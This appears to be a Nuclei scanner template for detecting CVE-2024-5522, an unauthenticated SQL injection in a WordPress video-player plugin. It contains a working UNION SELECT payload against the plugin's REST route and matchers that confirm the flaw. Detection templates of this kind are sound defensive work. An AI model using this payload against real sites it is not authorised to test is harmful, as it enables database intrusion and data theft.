43 lines
1.4 KiB
YAML
43 lines
1.4 KiB
YAML
id: CVE-2024-5522
|
|
|
|
info:
|
|
name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
|
|
author: JohnDoeAnonITA
|
|
severity: critical
|
|
description: |
|
|
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
|
|
remediation: Fixed in 2.5.27
|
|
reference:
|
|
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
|
|
classification:
|
|
cvss-score: 9.8
|
|
cwe-id: CWE-89
|
|
cve-id: CVE-2024-5522
|
|
epss-score: 0.04
|
|
epss-percentile: 9
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
publicwww-query: "/wp-content/plugins/html5-video-player"
|
|
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player
|
|
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5(num)}}'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950 |